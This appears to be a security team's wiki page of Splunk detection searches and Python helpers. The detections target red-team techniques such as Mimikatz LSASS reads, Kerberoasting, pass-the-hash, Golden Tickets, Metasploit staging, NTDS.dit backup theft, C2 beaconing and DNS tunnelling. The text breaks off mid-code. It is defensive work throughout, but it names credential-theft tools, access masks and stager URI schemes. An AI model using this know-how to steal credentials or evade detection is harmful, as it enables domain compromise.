CyHelp Intel-Driven Detection
Intel-Driven Detection

Targeted Monitoring

Important · read first This page is not a complete monitoring catalogue. It contains specific detections derived from the intelligence we received about the red team's planned techniques · credential attacks, Metasploit RC chains, Ansible-driven automation, AD enumeration, and network beaconing. Treat it as an extension of, not a replacement for, the general dashboards and alerts in Dashboards & Alerts.

Credential Attacks

LSASS access by a non-system process (Mimikatz)

Mimikatz (sekurlsa::logonpasswords, sekurlsa::tickets) opens lsass.exe and reads its memory to extract NTLM hashes, Kerberos keys and tickets. Sysmon Event 10 (ProcessAccess) records cross-process handle opens that match the Sysmon configuration, so the config needs a rule for TargetImage lsass.exe or nothing is logged at all. A handle to LSASS opened with the access masks below by anything other than the OS and your AV/EDR is highly suspicious; these are the GrantedAccess values Mimikatz and its derivatives most commonly request (0x1010 and 0x1410 are the minimal read masks, 0x1fffff is PROCESS_ALL_ACCESS).

Detect (SPL)
Sysmon Event 10 · LSASS access
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  EventCode=10
  TargetImage="*\\lsass.exe"
  GrantedAccess IN ("0x1010", "0x1410", "0x1438", "0x143a", "0x147a", "0x1fffff")
  SourceImage!="*\\Windows\\System32\\*"
  SourceImage!="*\\Windows\\WinSxS\\*"
  SourceImage!="*\\WindowsDefender\\*"
| table _time, ComputerName, SourceImage, GrantedAccess, CallTrace
Tip Excluding all of System32 is a blind spot: LSASS-dumping LOLBins such as rundll32.exe with comsvcs.dll MiniDump, or taskmgr.exe, live there. Once you know your AV/EDR binaries, replace the directory exclusions with an allowlist of those exact images. A CallTrace containing UNKNOWN (calling code not backed by a file on disk) is the strongest single indicator of an in-memory loader.

Kerberoasting · Event 4769 with RC4 (0x17)

Any authenticated domain user can request a service ticket (TGS) for any SPN. The red team requests tickets for many SPNs in a row, then cracks the service account's password offline from the ticket's encrypted part. RC4 (type 0x17) is the giveaway: modern Windows defaults to AES, and the usual tools deliberately request RC4 because it cracks far faster. Restrict to successful tickets (Failure_Code 0x0) and drop computer-account SPNs (names ending in $), whose 120-character random passwords are not crackable; the interesting targets are SPNs registered on user accounts.

Detect (SPL)
4769 RC4 burst
index=wineventlog EventCode=4769
  Ticket_Encryption_Type="0x17"
  Failure_Code="0x0"
  Service_Name!="krbtgt" Service_Name!="*$"
  Account_Name!="*$@*"
| bucket _time span=5m
| stats dc(Service_Name) as spns_requested, values(Service_Name) as spns, count
         by _time, Account_Name, Client_Address
| where spns_requested > 5
Tip Account_Name in 4769 is user@REALM, so a computer account appears as HOST$@REALM and a plain *$ pattern would not exclude it. Tools can also request AES tickets for accounts that support them, which slips past the 0x17 filter, so run the same burst count without the encryption-type clause as a second, lower-priority rule.

AS-REP Roasting · Event 4768 with RC4

Targets accounts with "Do not require Kerberos preauthentication" set. Without preauth the KDC hands an AS-REP to anyone who asks for it, and its encrypted part is protected with a key derived from the user's password (for RC4, the NT hash itself), so it cracks offline exactly like a Kerberoast ticket.

Detect (SPL)
4768 RC4, no preauth
index=wineventlog EventCode=4768
  Ticket_Encryption_Type="0x17"
  Result_Code="0x0"
  (Pre_Authentication_Type="0" OR PreAuthType="0")
| table _time, Account_Name, Client_Address, Ticket_Encryption_Type
Tip Pre-Authentication Type 0 means no preauth was performed, i.e. the account is AS-REP-roastable. The field is Pre_Authentication_Type in the classic WinEventLog extraction and PreAuthType in XmlWinEventLog; the query accepts both. Enumerate the exposed accounts in AD as well (the DoesNotRequirePreAuth user property) and fix them rather than only watching them.

Pass-the-Hash · Logon Type 3 with NTLM

A stolen NTLM hash is replayed to authenticate to another host without knowing the password. On the target it shows as a network logon (Type 3) with Authentication Package NTLM; on the source host, Mimikatz sekurlsa::pth produces a 4624 with Logon Type 9 (NewCredentials), Logon Process seclogo and Authentication Package Negotiate. Type 3 NTLM logons are also what ordinary file-share access looks like, so on its own the first query is a baseline, not an alert: look for user accounts reaching hosts they never touched before, for NTLM where Kerberos should have been negotiated, and pair it with the Type 9 signal.

Detect (SPL)
4624 Logon_Type=3 NTLM
# Target side: NTLM network logons by account and source
index=wineventlog EventCode=4624
  Logon_Type=3
  Authentication_Package="NTLM"
  Account_Name!="ANONYMOUS LOGON"
  Account_Name!="*$"
| stats count, dc(ComputerName) as targets by Account_Name, src_ip, Workstation_Name
| sort -targets, -count

# Source side: sekurlsa::pth spawns a process under a NewCredentials (Type 9) logon via seclogo
index=wineventlog EventCode=4624
  Logon_Type=9
  Logon_Process="seclogo"
  Authentication_Package="Negotiate"
| table _time, ComputerName, Account_Name, Process_Name

Golden Ticket / forged TGT

A Golden Ticket is a TGT forged offline with the krbtgt account's key, so the DC never issues it and there is no 4768 for it. What the DCs do see is the forged TGT being presented in TGS requests (4769) and the resulting logons (4624/4672). Look for 4769s from an account/client pair with no matching 4768 in the preceding TGT lifetime (10 hours by default), and for RC4 (0x17) TGS requests in a domain that otherwise negotiates AES (Mimikatz forges RC4 tickets unless /aes256 is given). On the target, a forged ticket often shows an Account Domain in 4624/4672 that is the FQDN (corp.local) or otherwise differs from the NetBIOS name (CORP) every genuine logon carries. Note that every legitimate 4768 names krbtgt as the service, so "any activity naming krbtgt" is not a signal by itself.

Detect (SPL)
Forged-TGT indicators
# 1. TGS requests (4769) with no TGT request (4768) from the same account and client; search all DCs together,
#    a client may get its TGT from one DC and its service tickets from another
index=wineventlog (EventCode=4768 OR EventCode=4769) earliest=-10h
  Account_Name!="*$@*"
| stats count(eval(EventCode=4768)) as tgt_requests,
        count(eval(EventCode=4769)) as tgs_requests,
        values(Service_Name) as services by Account_Name, Client_Address
| where tgt_requests=0 AND tgs_requests>0

# 2. RC4 TGS requests in an AES domain (Mimikatz default unless /aes256)
index=wineventlog EventCode=4769
  Ticket_Encryption_Type="0x17"
  Account_Name!="*$@*"
| stats count by Account_Name, Service_Name, Client_Address

Metasploit

Outbound on default MSF ports (4443 / 4444 / 4445)

Metasploit's default LPORT for reverse handlers is 4444; 4443 and 4445 are what operators type when 4444 is taken. Egress-filter your network to deny these by default, then alert on any attempt (allowed or blocked) that does occur. Treat it as a tripwire, not a detector: LPORT is a one-line change and a careful red team will use 443 or 8080.

Detect (SPL)
Network · MSF default ports
index=network dest_port IN (4443, 4444, 4445)
| stats count, values(action) as actions, values(dest_ip) as dest_ips by src_ip, dest_port
|sort -count

Suspicious children of msfconsole / .rb scripts

The red team's resource scripts (Delfino / Stambecco / Bigi) execute as .rb files driven by msfconsole. msfconsole is itself a Ruby program, so on the operator's box the parent shows up as ruby with msfconsole in the command line, and the children are whatever the scripts shell out to. Watch for that parent-child chain on any Linux host that is not a sanctioned attacker-emulation box.

Detect (SPL)
Linux · ruby/msfconsole + child
# Linux auditd / Sysmon-for-Linux; field names assume CIM (Endpoint.Processes) normalisation
index=main (sourcetype=auditd OR sourcetype=sysmon_linux)
  (parent_process_name IN ("ruby", "msfconsole") OR parent_process="*msfconsole*"
   OR process="*.rb*")
| stats count, values(process) as commands by host, parent_process_name, process_name
| sort -count

Staged Meterpreter payload

A staged payload is a tiny stager (a few hundred bytes) that connects back and downloads the real Meterpreter stage, a DLL of several hundred kilobytes, before the session starts. Over reverse_tcp the stage arrives as raw bytes prefixed with a 4-byte length; over reverse_http(s) the stager issues a GET to a random-looking single-segment path with no file extension and the stage comes back as one response far larger than a normal page. Legacy Metasploit builds used literal paths such as /INITM (Windows) and /INITJM (Java); current builds generate URL-safe Base64 paths (4 characters in old versions, 22 or more today because a payload UUID is embedded) padded so that the 8-bit checksum of the path identifies the request type (92 for a Windows stage request, 88 Java, 80 Python, 98 for an existing session). A literal match therefore only catches old builds. After staging, the session keeps polling the same host with small GETs, which the beaconing search under Network picks up.

Detect (SPL)
Web proxy · Meterpreter stager patterns
(index=proxy OR index=web) http_method=GET status=200
| eval path=coalesce(uri_path, uri)
| regex path="^/(INITM|INITJM|[A-Za-z0-9_-]{4,})$"
| stats count, values(path) as paths, max(bytes) as max_bytes by src_ip, dest_ip
| where max_bytes > 100000 OR count > 2
Tip Suricata / Snort with the ET MALWARE (formerly ET TROJAN) ruleset catches most stagers natively; if you have it, feed the alerts into Splunk and watch index=ids. The regex accepts any extension-less single-segment path, so some API endpoints will match; score those by checksum or response size. Over HTTPS the path is invisible unless the proxy inspects TLS, in which case only the connection-size and beaconing signals remain.
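The checksum test described above, as an added example written for this page (not Metasploit's code and not part of the original page). It re-implements the scheme from Metasploit's Rex::Payloads::Meterpreter::UriChecksum, sum of the path bytes modulo 256 compared against the per-request-type constants, and runs it over a constructed proxy log to find the stage download and the session polls; the log format, hosts and paths are made up for the example.

```python
"""Flag proxy-log requests whose path fits Metasploit's HTTP stager / session URI scheme.

Added example for this page, not Metasploit code. It re-implements the check from
Metasploit's Rex::Payloads::Meterpreter::UriChecksum: the path is a single run of
URL-safe Base64 characters whose 8-bit checksum (sum of bytes mod 256) equals a
per-request-type constant. The log format and the log lines are constructed."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constants from uri_checksum.rb (value -> meaning)
URI_CHECKSUMS = {
    92: "INITW/INITN (Windows or native stage request)",
    88: "INITJ (Java stage request)",
    80: "INITP (Python stage request)",
    95: "INIT_CONN (new stageless session)",
    98: "CONN (existing session poll)",
}

# Exactly one path segment of URL-safe Base64 characters: no dots, extra slashes or query string
MSF_PATH_RE = re.compile(r"^/([A-Za-z0-9_-]{4,})$")


def checksum8(text: str) -> int:
    """Rex::Text.checksum8: sum of the byte values modulo 256."""
    return sum(text.encode("ascii")) % 256


def classify_path(path: str) -> Optional[str]:
    """Return the request type if the path matches the checksum scheme, else None."""
    m = MSF_PATH_RE.match(path)
    if not m:
        return None
    return URI_CHECKSUMS.get(checksum8(m.group(1)))


# Constructed proxy log: time src dst method path status bytes
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 10.1.2.30 198.51.100.7 GET /Az0q 200 1146880
2024-03-01T10:00:05Z 10.1.2.30 198.51.100.7 GET /Az0w 200 312
2024-03-01T10:00:10Z 10.1.2.30 198.51.100.7 GET /Az0w 200 298
2024-03-01T10:00:11Z 10.1.2.31 203.0.113.9 GET /index.html 200 5120
2024-03-01T10:00:12Z 10.1.2.31 203.0.113.9 GET /static/app.js 200 88000
2024-03-01T10:00:13Z 10.1.2.32 203.0.113.9 GET /Azzq 200 4000
"""
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def scan_log(log_text: str) -> List[dict]:
    """Successful GETs whose path classifies as a Meterpreter URI."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, dst, method, path, status, nbytes = m.groups()
        kind = classify_path(path)
        if method == "GET" and status == "200" and kind:
            hits.append({"time": ts, "src": src, "dst": dst, "path": path,
                         "bytes": int(nbytes), "type": kind})
    return hits


def summarize(hits: List[dict]) -> Dict[Tuple[str, str], dict]:
    """Per (src, dst): hit count, largest response (the stage download is big) and request types."""
    out: Dict[Tuple[str, str], dict] = {}
    for h in hits:
        s = out.setdefault((h["src"], h["dst"]), {"count": 0, "max_bytes": 0, "types": Counter()})
        s["count"] += 1
        s["max_bytes"] = max(s["max_bytes"], h["bytes"])
        s["types"][h["type"]] += 1
    return out


if __name__ == "__main__":
    for pair, s in summarize(scan_log(SAMPLE_LOG)).items():
        print(pair, s["count"], s["max_bytes"], dict(s["types"]))
```

The 4-character paths in the sample mirror the oldest stagers; current builds emit 22 or more characters, which the same regex and checksum accept. SPL has no convenient per-character loop, so the Splunk search above leans on path shape and response size; use this scoring on exported proxy logs, or as the spec for a scripted lookup, when you need to separate real Meterpreter URIs from short API endpoints.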

Post-exploitation: process migration & token impersonation

After landing, Meterpreter migrates into a long-lived process (explorer.exe, or a svchost.exe it can open) or impersonates a token it finds via incognito. Migration writes the stage into the target process and starts a thread there, which Sysmon records as Event 8 (CreateRemoteThread) and, for the handle open, Event 10. Reflectively loaded code shows an empty StartModule/StartFunction because the start address maps to no image on disk. Token impersonation itself leaves little in the default logs; with Audit Sensitive Privilege Use enabled, 4673 shows SeDebugPrivilege and SeImpersonatePrivilege being exercised, and user-level processes doing so are worth a look.

Detect (SPL)
Sysmon Event 8 · remote thread into a long-lived process
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  EventCode=8
  TargetImage IN ("*\\explorer.exe", "*\\svchost.exe", "*\\winlogon.exe", "*\\lsass.exe")
  SourceImage!="*\\System32\\*"
| stats count, values(StartModule) as start_modules, values(StartFunction) as start_functions
         by ComputerName, SourceImage, TargetImage
Tip Excluding everything under System32 hides a stager that was itself injected into a system binary; flip the exclusion into an allowlist of your EDR/AV processes once you know them, and treat an empty StartModule as the strongest single indicator.

Ansible / Automation

Mass SSH connections from a single source

Ansible drives many hosts from one controller over SSH. That is legitimate, but it is exactly the pattern an attacker who has compromised the controller (or stolen its key) will produce. Baseline the controller's IP and the service account it uses; alert on any other source fanning out, and separately on the controller connecting as an unexpected user or outside its run schedule.

Detect (SPL)
SSH fan-out
index=main sourcetype=linux_secure "Accepted" earliest=-15m
| stats dc(host) as distinct_targets, values(user) as users, count by src_ip
| where distinct_targets > 5 AND src_ip!="<ANSIBLE_CTRL_IP>"
| sort -distinct_targets

Execution of .rb from non-standard paths

Legitimate Ruby and Ansible code runs out of system and package paths (/usr/bin, /usr/lib/ruby, site-packages, a venv). A .rb invoked from /tmp, /var/tmp, /dev/shm or a home directory is a strong signal on servers; on developer workstations expect noise from $HOME, so scope the rule by host group or user.

Detect (SPL)
auditd · .rb in suspicious paths
# auditd EXECVE records; the command field assumes the add-on has joined argv (raw records split it into a0, a1, ...)
index=main sourcetype=auditd type=EXECVE
  command="*.rb*"
  (command="*/tmp/*" OR command="*/var/tmp/*"
   OR command="*/dev/shm/*" OR command="*/home/*")
| table _time, host, user, command

File creation in /tmp or %TEMP% followed by immediate execution

Drop-and-run: the file is written and then executed within seconds, a pattern common to implants, stagers and post-exploitation modules. The search correlates a Sysmon file-create (Event 11) with a process-create (Event 1) of the same path and requires the create to come first; without that ordering check a long-running binary that merely rewrites a file in Temp would match. The Linux equivalent pairs an auditd PATH record with the EXECVE of the same file.

Detect (SPL)
Sysmon · drop-and-run
# Sysmon: file create (11) followed within 10 s by process create (1) of the same path
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  (EventCode=11 OR EventCode=1)
  (TargetFilename="*\\Temp\\*" OR Image="*\\Temp\\*")
| eval path=lower(coalesce(TargetFilename, Image))
| stats min(eval(if(EventCode=11, _time, null()))) as created,
        min(eval(if(EventCode=1, _time, null()))) as executed,
        values(Image) as images by ComputerName, path
| where isnotnull(created) AND isnotnull(executed)
        AND executed >= created AND executed - created < 10

Active Directory

Unusual access to the Domain Controller

Interactive or RDP logons to a Domain Controller, or access to its admin shares, from anything other than known Tier-0 administrators (and their admin workstations) is high-priority. The ComputerName pattern below assumes your DCs have DC in the hostname; a lookup of DC names is more robust.

Detect (SPL)
DC logons / admin-share access
index=wineventlog ComputerName="*DC*"
  ((EventCode=4624 Logon_Type IN (2, 10))
   OR (EventCode=5140 (Share_Name="*\\ADMIN$" OR Share_Name="*\\C$")))
  Account_Name!="*$"
| fillnull value="-" Logon_Type
| stats count by EventCode, Account_Name, src_ip, Logon_Type
| search NOT Account_Name IN ("<known_tier0_admin>", "<known_tier0_admin_2>")
Tip 5140 needs "Audit File Share" enabled on the DCs. Keep the Tier-0 list in a lookup rather than inline so it is maintained in one place, and do the same for the DC hostnames.

AD backup requests · ntdsutil / vssadmin / wbadmin

The intel calls this the "BackupPriv" path: an account holding SeBackupPrivilege (or Domain Admin) pulls a copy of NTDS.dit via ntdsutil's Install-From-Media export, a Volume Shadow Copy (vssadmin/diskshadow) or wbadmin, then extracts every domain hash offline. Any of these binaries on a DC, especially with arguments like ifm, create shadow or a path containing ntds, demands immediate attention. 4688 only carries Process_Command_Line when "Include command line in process creation events" is enabled; Sysmon Event 1 has it by default but under different field names, which the query normalises.

Detect (SPL)
Backup-tool process create
index=wineventlog (EventCode=4688 OR (EventCode=1 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational))
| eval proc=coalesce(New_Process_Name, Image),
       cmd=coalesce(Process_Command_Line, CommandLine),
       user=coalesce(User, Account_Name)
| search proc IN ("*\\ntdsutil.exe", "*\\vssadmin.exe", "*\\wbadmin.exe", "*\\diskshadow.exe")
| where like(proc, "%ntdsutil.exe")
     OR match(cmd, "(?i)\bifm\b|create\s+shadow|ntds")
| table _time, ComputerName, user, proc, cmd

Large LDAP queries (AD enumeration)

BloodHound / SharpHound and similar tools issue long, complex LDAP filters that pull thousands of objects in minutes; normal applications query a handful. Event 4662 (Directory Service Access) is the generic object-access audit: it needs "Audit Directory Service Access" on the DCs plus SACLs on the objects, and it carries no client address, so group it by account. Event 1644 is logged by the NTDS service for expensive or inefficient LDAP searches once the "15 Field Engineering" diagnostic level is set to 5; it records the client address, the filter and the number of entries visited, which is the better signal if you can turn it on.

Detect (SPL)
4662 / 1644 · Directory Service queries
# 4662: no client IP in the event, so the account is the only pivot
index=wineventlog ComputerName="*DC*" EventCode=4662
  Account_Name!="*$"
| bucket _time span=10m
| stats count by _time, Account_Name
| where count > 500

# 1644: expensive/inefficient LDAP searches (Field Engineering = 5); the client and filter are in the message body
index=wineventlog ComputerName="*DC*" EventCode=1644
| bucket _time span=10m
| stats count by _time, host
| where count > 20

Account creation or privileged group modification

4720 = user account created · 4728 = member added to a security-enabled global group · 4732 = member added to a security-enabled local group (e.g. Administrators) · 4756 = member added to a security-enabled universal group. A new account followed within minutes by a privileged-group addition is the classic privilege-escalation / persistence signal. In the group events the group is the Target_Account_Name and the added account is Member_Name (a distinguished name), so the correlation key has to be built from both.

Detect (SPL)
4720 / 4728 / 4732 / 4756 burst
index=wineventlog
  (EventCode=4720 OR EventCode=4728 OR EventCode=4732 OR EventCode=4756)
| rex field=Member_Name "^CN=(?<member>[^,]+)"
| eval acct=if(EventCode=4720, Target_Account_Name, member)
| bucket _time span=10m
| stats values(EventCode) as events,
         values(eval(if(EventCode!=4720, Target_Account_Name, null()))) as groups,
         count by _time, acct, ComputerName
| where mvcount(events) > 1
Tip Member_Name looks like CN=bob,CN=Users,DC=corp,DC=local, hence the rex. Add a filter on groups IN ("Domain Admins", "Administrators", "Enterprise Admins", ...) if ordinary group churn makes this too noisy, and remember that a 10-minute bucket can split a create-then-add pair across two buckets.

Network

Regular beacons to external IPs (C2)

C2 traffic is usually quiet but periodic: the same internal host contacting the same external endpoint at near-constant intervals. Compute the time between consecutive connections per (src, dst) pair and look for many connections with a low spread in those deltas. Meterpreter and most frameworks add configurable jitter (commonly 10 to 50 percent of the interval), so judge the spread relative to the mean (coefficient of variation) rather than as a fixed number of seconds, and widen the search window for sleep intervals longer than a few minutes.

Detect (SPL)
Beacon detection · inter-arrival variance
index=network earliest=-24h
  dest_ip!="10.0.0.0/8" dest_ip!="172.16.0.0/12" dest_ip!="192.168.0.0/16"
| sort 0 src_ip, dest_ip, _time
| streamstats current=f last(_time) as prev_time by src_ip, dest_ip
| eval delta=_time - prev_time
| where isnotnull(delta)
| stats count, avg(delta) as avg_delta, stdev(delta) as jitter,
        values(dest_port) as ports by src_ip, dest_ip
| eval cv=jitter/avg_delta
| where count > 10 AND avg_delta > 15 AND cv < 0.2
| sort cv
Tip streamstats current=f last(_time) gives each event the previous timestamp of the same pair, so the first connection of a pair yields no delta instead of a zero that would drag the standard deviation down.
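The same measurement outside Splunk, as an added example written for this page (not code from the original page or from any tool it names). It groups connections per (src, dst) pair, takes the inter-arrival deltas and scores regularity by coefficient of variation; the connection records are constructed, one host polling every 60 s with a deterministic plus/minus 9 s jitter and one host browsing in bursts, so the result is reproducible.

```python
"""Beacon detection: regularity of inter-arrival times per (src, dst) pair.

Added example for this page; not code from the original page or from any tool it
names. The connection records are constructed: one host polls a C2 roughly every
60 s with a deterministic +/-9 s jitter, another host browses in short bursts with
long idle gaps. Regularity is judged by the coefficient of variation (stdev / mean)
so a beacon with proportional jitter still scores as regular."""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Iterable, List, Tuple


def beacon_candidates(conns: Iterable[Tuple[float, str, str]],
                      min_count: int = 10, min_interval: float = 15.0,
                      max_cv: float = 0.2) -> List[dict]:
    """conns: (timestamp_seconds, src_ip, dst_ip). Returns regular pairs, most regular first."""
    by_pair = defaultdict(list)
    for ts, src, dst in conns:
        by_pair[(src, dst)].append(ts)
    results = []
    for (src, dst), times in by_pair.items():
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]  # first event has no delta
        if len(deltas) < min_count:
            continue
        avg = mean(deltas)
        if avg < min_interval:  # sub-15 s intervals are chatty apps, not sleep/poll loops
            continue
        cv = pstdev(deltas) / avg
        if cv < max_cv:
            results.append({"src": src, "dst": dst, "count": len(times),
                            "avg_delta": round(avg, 1), "cv": round(cv, 3)})
    return sorted(results, key=lambda r: r["cv"])


def constructed_connections() -> List[Tuple[float, str, str]]:
    """Constructed traffic: one beacon pair and one browsing pair."""
    conns = []
    # Beacon: 60 s sleep plus a deterministic jitter cycling through -9..+9 s
    t = 0.0
    for i in range(40):
        t += 60 + ((i * 7) % 19 - 9)
        conns.append((t, "10.1.2.30", "198.51.100.7"))
    # Browsing: five bursts of eight requests 0.5 s apart, 20+ minutes idle in between
    t = 0.0
    for burst in range(5):
        for i in range(8):
            conns.append((t + i * 0.5, "10.1.2.31", "203.0.113.9"))
        t += 1200 + burst * 60
    return conns


if __name__ == "__main__":
    for r in beacon_candidates(constructed_connections()):
        print(r)
```

The browsing host has a far larger mean gap than the beacon but a coefficient of variation near 3, so it drops out; the beacon's jitter is about 9 percent of its interval and survives. Lowering max_cv to 0.05 would miss it, which is the trade-off against frameworks that configure large jitter.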

web2pdf · suspicious User-Agent on outbound HTTP

The intel names web2pdf as a known beacon vector. Most legitimate clients present a recognisable User-Agent (browser, curl, wget, Splunk forwarder, package managers). Anything labelled web2pdf, missing, or a bare library UA should be inspected; python-requests and Go-http-client are legitimate on automation hosts, so baseline those sources rather than alerting on every hit. The field is useragent here; in CIM-normalised proxy data it is http_user_agent.

Detect (SPL)
web2pdf / odd User-Agent
(index=proxy OR index=web)
  (useragent="*web2pdf*"
   OR NOT useragent=*
   OR useragent="-"
   OR useragent="*python-requests*"
   OR useragent="*Go-http-client*")
| stats count, values(uri) as uris by src_ip, dest_ip, useragent
| sort -count

Lateral movement · cascading SMB / WinRM / RDP

The attacker pivots host-to-host. In the network logs this looks like A→B then, shortly after, B→C on the same admin protocols (SMB 445, RDP 3389, WinRM 5985/5986). The search tags every flow twice, once for its destination ("in") and once for its source ("out"), so that per host it can compare when it was first reached against when it first reached out; it also reports the plain fan-out count for hosts that hit many targets. Jump servers and vulnerability scanners will trip this; allowlist them.

Detect (SPL)
Internal admin-port fan-out and hop chain
index=network
  dest_port IN (445, 3389, 5985, 5986)
  src_ip="10.0.0.0/8" dest_ip="10.0.0.0/8"
  earliest=-30m
| eval hops=mvappend("in|".dest_ip, "out|".src_ip)
| mvexpand hops
| rex field=hops "^(?<role>\w+)\|(?<host>.+)$"
| stats dc(eval(if(role="out", dest_ip, null()))) as distinct_targets,
        min(eval(if(role="in", _time, null()))) as first_in,
        min(eval(if(role="out", _time, null()))) as first_out,
        values(dest_port) as ports by host
| where distinct_targets > 3 OR (first_out > first_in AND first_out - first_in < 600)

Unusual DNS activity · exfiltration / recent domains

DNS tunnelling and exfiltration show up as long, high-entropy leftmost labels (encoded data) under one attacker-controlled domain, usually with many distinct labels, high query volume and TXT/NULL record types. Length is a cheap proxy for entropy in SPL, which has no entropy function of its own. Newly-registered domains are common for C2 because the attacker wants a clean reputation.

Detect (SPL)
Long / high-entropy DNS queries
index=dns
| eval labels=split(query, "."), label=mvindex(labels, 0),
       domain=mvjoin(mvindex(labels, -2, -1), ".")
| eval qlen=len(query), label_len=len(label)
| stats count, dc(label) as unique_labels, max(label_len) as max_label_len,
        max(qlen) as max_qlen, values(record_type) as rtypes by src_ip, domain
| where max_qlen > 60 OR max_label_len > 30 OR unique_labels > 100
| sort -unique_labels
Tip The URL Toolbox app adds ut_shannon; apply it to label and threshold at about 3.5 bits. For "recent domain" detection, enrich domain with a WHOIS or threat-intel lookup feeding a Splunk lookup table, then filter on domain_age < 30d. CDNs and cloud services produce long names legitimately; allowlist those domains rather than raising the thresholds. The two-label domain approximation is wrong for public suffixes such as co.uk.
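The entropy scoring the SPL cannot do natively, as an added example written for this page (not code from the original page). It computes Shannon entropy of the leftmost label, applies the length thresholds from the search above, and aggregates distinct labels per registrable domain over constructed query-log lines; the domain approximation (last two labels) is the same shortcut as the SPL and is labelled as such.

```python
"""Score DNS queries for tunnelling / exfiltration: leftmost-label length, Shannon
entropy of the label, and distinct labels per registrable domain.

Added example for this page (not code from the original). Query-log lines are
constructed. The registrable domain is approximated as the last two labels, which
is wrong for multi-label public suffixes such as co.uk; use the Public Suffix List
in production."""
import math
from typing import Dict, List, Tuple


def shannon_entropy(s: str) -> float:
    """Bits per character; 0 for a one-symbol string, log2(k) for k equally frequent symbols."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(qname: str) -> Tuple[str, str]:
    """(leftmost label, two-label domain approximation)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[0], ".".join(labels[-2:])


def score_query(qname: str, max_label_len: int = 30, max_qname_len: int = 60,
                min_entropy: float = 3.5) -> List[str]:
    """Reasons the query looks like encoded data (empty list = nothing odd)."""
    leftmost, _ = split_query(qname)
    reasons = []
    if len(qname) > max_qname_len:
        reasons.append("long_qname")
    if len(leftmost) > max_label_len:
        reasons.append("long_label")
    # Short labels have too few symbols for entropy to mean anything
    if len(leftmost) >= 16 and shannon_entropy(leftmost) >= min_entropy:
        reasons.append("high_entropy_label")
    return reasons


def aggregate(log_lines: List[str], min_unique_labels: int = 20) -> Dict[Tuple[str, str], dict]:
    """Per (src, domain): query count, distinct leftmost labels, flagged queries, verdict.
    Each line: '<ts> <src_ip> <qname> <qtype>' (constructed format)."""
    out: Dict[Tuple[str, str], dict] = {}
    for line in log_lines:
        _ts, src, qname, qtype = line.split()
        leftmost, domain = split_query(qname)
        s = out.setdefault((src, domain), {"queries": 0, "labels": set(), "flagged": 0, "qtypes": set()})
        s["queries"] += 1
        s["labels"].add(leftmost)
        s["qtypes"].add(qtype)
        if score_query(qname):
            s["flagged"] += 1
    for s in out.values():
        s["unique_labels"] = len(s["labels"])
        s["suspicious"] = s["flagged"] > 0 or s["unique_labels"] >= min_unique_labels
    return out


def constructed_log() -> List[str]:
    """24 tunnelling queries from one host, a handful of ordinary lookups from another."""
    lines = []
    alphabet = "abcdefghijklmnopqrstuvwxyz012345"  # 32 distinct symbols -> entropy 5.0 bits
    for i in range(24):
        label = alphabet[i % 32:] + alphabet[:i % 32]  # rotate: distinct labels, same entropy
        lines.append(f"1700000{i:03d} 10.1.2.30 {label}.c2.example TXT")
    for host in ("www.example.com", "mail.corp.example.com", "d1a2b3c4d5e6f7.cloudfront.net",
                 "login.microsoftonline.com", "www.example.com"):
        lines.append(f"1700000900 10.1.2.31 {host} A")
    return lines


if __name__ == "__main__":
    for key, s in aggregate(constructed_log()).items():
        print(key, s["queries"], s["unique_labels"], s["flagged"], s["suspicious"])
```

The CDN hostname in the sample shows why the entropy check only runs on labels of 16 characters or more: a 14-character hex label scores high per character but is too short to carry data, and would otherwise flood the rule with false positives.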

General

PowerShell with -EncodedCommand or -NoProfile

Both flags are heavily used by attackers. -EncodedCommand (also accepted as -enc or just -e) takes a Base64 blob of UTF-16LE script, hiding the command from anyone reading the process command line; -NoProfile (-nop) skips profile scripts, which is where some environments configure logging or transcription defaults, and is also simply faster and quieter. -NoProfile alone is extremely common in legitimate scheduled tasks and management tooling, so weight it as a secondary signal and combine it with -WindowStyle Hidden. A plain *-enc* wildcard also matches -Encoding (an ordinary cmdlet parameter), so the query matches the switch followed by a Base64 run instead. With Script Block Logging enabled, Event 4104 shows the decoded script regardless of flags.

Detect (SPL)
4688 PowerShell flags
index=wineventlog EventCode=4688
  (New_Process_Name="*\\powershell.exe" OR New_Process_Name="*\\pwsh.exe" OR New_Process_Name="*\\powershell_ise.exe")
| eval cmd=Process_Command_Line
| eval encoded=if(match(cmd, "(?i)\s-e[a-z]{0,13}\s+[A-Za-z0-9+/=]{20,}"), 1, 0),
       noprofile=if(match(cmd, "(?i)\s-nop(rofile)?\b"), 1, 0),
       hidden=if(match(cmd, "(?i)\s-w(indowstyle)?\s+hidden"), 1, 0)
| where encoded=1 OR (noprofile=1 AND hidden=1)
| table _time, ComputerName, User, encoded, noprofile, hidden, Process_Command_Line
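Decoding the blob is the next step an analyst takes, so here is an added example written for this page (not code from the original page) that extracts the -EncodedCommand argument, honours PowerShell's prefix-abbreviated switches, rejects look-alikes such as -Encoding and -ExecutionPolicy, decodes Base64/UTF-16LE, and applies the same three flags as the SPL. The command lines are constructed; the download-cradle payload is a placeholder with a documentation IP.

```python
"""Decode PowerShell -EncodedCommand arguments and flag the switch combinations the
4688 search looks for. Added example for this page; command lines are constructed.

PowerShell accepts any unambiguous prefix of a switch, so -e, -ec, -enc and
-EncodedCommand are all valid; -Encoding and -ExecutionPolicy also start with -e
but are not it. The payload is Base64 of UTF-16LE text."""
import base64
import re
from typing import Optional, Tuple

# -<e...> <base64>: candidate switch plus the following token
SWITCH_RE = re.compile(r"(?:^|\s)[-/](e[a-z]{0,13})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
NOPROFILE_RE = re.compile(r"(?:^|\s)[-/]nop(rofile)?\b", re.IGNORECASE)
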